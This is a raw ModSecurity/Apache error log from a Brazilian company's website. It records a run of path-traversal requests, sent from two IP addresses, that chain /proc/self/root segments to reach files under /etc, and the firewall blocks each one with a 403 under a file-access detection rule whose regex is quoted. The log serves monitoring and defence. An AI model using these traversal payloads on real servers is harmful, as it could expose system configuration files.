"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKmNCmCSWTlPouqorMbAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:35:48.914645 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:33654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKpAeiSKl8TjouI-YCwAAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:35:50.212810 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.243.203:49288] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKppDEJR9VXonE_-1PhQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:36:00.319152 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:49290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKsO82sZHvlq4xgHrC-AAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:36:16.575517 2026] [:error] [pid 2159:tid 140411632822016] [client 74.7.243.203:48258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKwPct6CQ8jnRyg2p89AAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:36:32.142374 2026] [:error] [pid 11293:tid 140411674785536] [client 74.7.241.46:52898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKztCmCSWTlPouqorMogAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:36:33.263044 2026] [:error] [pid 2159:tid 140411691570944] [client 74.7.243.203:52892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablK0fct6CQ8jnRyg2p9AwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:36:42.171837 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.243.203:59768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablK2pqmL8PQht4WJFlIfwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:36:50.103143 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.243.203:48376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablK4tCmCSWTlPouqorMswAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:37:12.006893 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.243.203:52270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablK-FKJy4A1bGlmj9BWcwAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:15.524976 2026] [:error] [pid 1210:tid 140411616036608] [client 74.7.243.203:45282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablK-1KJy4A1bGlmj9BWegAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:37:22.532305 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.243.203:45286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLAv0Bec_B9OkZP_i9uAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:37:38.840247 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.241.46:58146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLEpqmL8PQht4WJFlIugAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:40.215634 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.241.46:33788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLFP0Bec_B9OkZP_i9wQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:41.537840 2026] [:error] [pid 2553:tid 140411708356352] [client 74.7.241.46:33798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLFf0Bec_B9OkZP_i9wwAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:43.027441 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.46:33800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLFqBJNF7axNlVR0X9igAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:44.433697 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.46:33814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLGAeiSKl8TjouI-YC8QAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:37:58.056173 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.241.46:33828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLJpqmL8PQht4WJFlIzAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:38:10.095609 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.241.46:60132] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLMqBJNF7axNlVR0X9rQAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:38:14.611384 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:35196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLNqBJNF7axNlVR0X9tAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:38:34.746839 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:43282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLSu82sZHvlq4xgHrDoQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:38:36.077858 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.243.203:47202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLTJDEJR9VXonE_-1P9AAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
